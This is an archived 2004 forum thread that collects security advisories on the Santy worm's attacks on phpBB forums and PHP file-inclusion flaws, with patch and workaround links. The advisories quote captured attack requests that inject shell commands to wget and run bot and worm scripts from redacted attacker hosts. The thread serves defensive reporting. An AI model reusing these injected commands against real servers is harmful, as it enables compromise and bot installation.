This is a read-only archive. No new posts or registrations. Privacy Page
Discussion

Worm Turned Loose On Phpbb Web Sites!

5 min read

This thread's last reply is from . Advice, software, and links below may be out of date — treat specific steps and download links with caution.

More on this:

- http://isc.sans.org/diary.php?date=2004-12-21
Updated December 21st 2004 21:21 UTC
Santy worm defaces websites using php bug
"…The worm is written in Perl and seems to overwrite all writeable asp/php/htm/shtm files on the server.
Note: we earlier reported that it takes advantage of a php vulnerability. This does not seem to be the case. The worm exploits the 'highlight' bug in phpBB 2.0.10 and earlier. The current version of phpBB (2.0.11, released Nov. 18th) fixes this problem. Nevertheless, its still a good idea to update php.
We do now have a couple of versions of the code. The virus appears to increment a 'generation' number whenever it infects a site. If you have a copy of a generation < 4, please let us know. A few more details from a preliminary analysis: The worm uses Google to search for links to 'viewtopic.php'. This search will return sites that link to phpBB sites, as well as the phpBB sites themselves (plus of course a lot of others). The search includes a random parameter as well. Likely, this should randomize the results. The perl script makes use of Socket.pm to setup the HTTP connections. The headers the script generates are:

GET $res HTTP/1.0
Host: $host
Accept:*/*
Accept-Language: en-us,en-gb;q=0.7,en;q=0.3
Pragma: no-cache
Cache-Control: no-cache
Referer:http://" . $host . $res .
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Connection: close

$host and $res are replaced with the hostname and URL respectively. More details on the Sanity worm are available at:
- http://www.viruslist.com/en/weblog
- http://www.europe.f-secure.com/weblog/

Public exploit code for the php vulnerability has recently been made available. If you are unable to update your PHP engine at this time, a workaround for phpBB can be found at: http://www.phpbb.com/phpBB/viewtopic.php?f=14&t;=240513
In addition to the above workaround, Version 4.3.10 or 5.0.3 can be downloaded from: http://www.php.net/downloads.php

If you are infected and are able to extract a copy of the perl script, please submit it via our contact form: http://isc.sans.org/contact.php …"

:(
FYI…

- http://isc.sans.org/diary.php?date=2004-12-22
Updated December 22nd 2004 05:40 UTC
"Santy Worm Update
According to http://news.zdnet.com/2100-1009_22-5500265.html Google has deactivitated queries essential to Santy's propogation, which should lead to it's dying off (or by this point gone-ness). This is only a temporary fix, I would imagine, as I'm sure other queries can be crafted and the same exploit code used to relaunch this worm. Time will tell. As a side note, we have the exploit code, so no need to send more unless you have the earlier generations that did not do defacing…"

(…"infected about 40,000 Web sites by Tuesday evening…")
FYI…

PHP exploits and phpBB
- http://www.phpbb.com/phpBB/viewtopic.php?f=14&t;=248046
"…Fixed versions of PHP do exist…we encourage you to ensure your system is running such a version. Equally please examine any "hacking" issues you have carefully to ensure they are not caused by this PHP problem (rather than phpBB). Remember, this is not a phpBB exploit or problem, it's a PHP issue and thus can affect any PHP script which uses the noted functions."

:ph34r:
More detail on new Santy variant:

- http://www.viruslist.com/en/weblog
December 26, 2004
"We have detected a new Santy variant which also targets vulnerabilties in older versions of php.
This new variant is more advanced/dangerous in a number of ways:
-Uses yahoo next to google to search for vulnerable sites.
-Targets next to 'phpBB pre 2.0.11' sites, also sites that use an older version of php.
-New Santy variants try to install a Bot, giving the masters control.
-Most sites have got huge bandwidth, this would make a spam run or DDoS extremely effective - although this is a side effect. We detect the latest Santy variant as Net-Worm.Perl.Santy.e, the installed bot as Backdoor.Perl.Shellbot.b. There are also some other new Perl Backdoors

….detailed analysis of Santy.e is showing very worrying info. The initial analysis suggested that with an updated version of php, one was not vulnerable for this attack, but it seems that Santy.e tries to exploit bad coding. Santy.e tries to exploit php scripts with what is called "PHP Scripts Automated Arbitrary File Inclusion". This can only be prevented with decent, secure coding. This means that every site is potentially in danger…"

- http://www.europe.f-secure.com/weblog/
"…Several phpBB administrators have reported to us that they are seeing lots of Santy-like activity. Like mentioned before, Google is filtering the searches that the original Santy (and the variants that were created by corruption) were using. But now we're seeing fairly large network scans that are trying to find vulnerable phpBB forums in order to install IRC bots on them. Typical requests look like this:

GET /phpBB2/viewtopic.php?t=533&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;
wget%20hostnameremoved.org/pdf/bot;perl%20bot;wget%20hostnamemoved.org/pdf/ssh.a;… "

>>> http://isc.sans.org/diary.php?date=2004-12-25
Updated December 26th 2004 02:11 UTC
"We are putting this up early because we have been receiving several reports on a possible Santy variant worm. It is however quite different from the original Santy worm. It tries to pull several scripts from an affected forum (running phpBB). The forum could have been compromised and used as a base to attack others. Here is one of the submission we received. Others are quite similar.

"GET /modules.php?name=http://www.[XXX].net/spy.gif?&cmd=cd%20/tmp;
wget%20www.[XXX].net/spybot.txt;wget%20www.[XXX].net/worm1.txt;
wget%20www.[XXX].net/php.txt;wget%20www.[XXX].net/ownz.txt;
wget%20www.[XXX].net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;
perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 21626 "-" "LWP::Simple/5.803"

You can see that the files pull off include:
spy.gif (which contains a script)
spybot.txt
worm1.txt
php.txt
ownz.txt
zone.txt

…

K-Otik has published a copy that uses AOL/Yahoo search instead.
- http://www.k-otik.com/exploits/20041225.SantyB.php …"


(More detail available - use the ISC link above)

EDIT/ADD: New Symantec posts:
- http://www.sarc.com/avcenter/venc/data/perl.santy.c.html

- http://www.sarc.com/avcenter/venc/data/perl.santy.b.html
FYI…

- http://isc.sans.org/diary.php?date=2004-12-26
Updated December 26th 2004 23:03 UTC
"…A php Internet worm released on 12/25/2004 that doesn't use php bulletin boards - it attacks "ALL php scripts/pages which are vulnerable to a "File Inclusion" Flaw".

K-OTik Security has issued an Alert to clarify issues relating to whether or not php worms commonly named santy.c and santy.e attack bulletin boards. They have demonstrated that a php worm released on 12/25/2004 and commonly called santy.c and santy.e has had incorrect information associated with the descriptions of it that may delude you into thinking that, since you do not use php bulletin boards, your server is not at risk. K-OTik Security has named this the PhpInclude.Worm and their alert is emphatic that "This worm attacks ALL php scripts/pages which are vulnerable to a "File Inclusion" Flaw (related to an insecure use of the Include() & Require() functions). These "programming" flaws are independent from the server's PHP version, they result from common coding mistakes. K-OTik has described this worm as a significant threat. And from what I've seen this shift and weekend you may not be configured to "Dodge This".

The K-OTik Alert is at:
- http://www.k-otik.com/exploits/20041225.PhpIncludeWorm.php

For background PhpInclude information see the summary:
- http://www.devshed.com/c/a/PHP/PHP-Security-Mistakes/ …"